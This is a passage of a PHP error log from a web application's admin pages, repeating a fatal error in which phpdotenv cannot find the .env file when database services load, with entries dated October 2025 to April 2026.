/home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:55:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:55:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [14-Oct-2025 03:57:54 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:01:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:36:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:36:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:39:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:45:24 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:45:24 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:34:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:42:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 13:56:40 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 14:14:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 14:20:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 05:29:49 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:55:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 09:56:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:03:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:03:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:03:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:03:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:03:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:04:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:05:09 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:20:50 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:22:20 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:35:30 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:37:07 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:37:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:37:13 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:37:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in 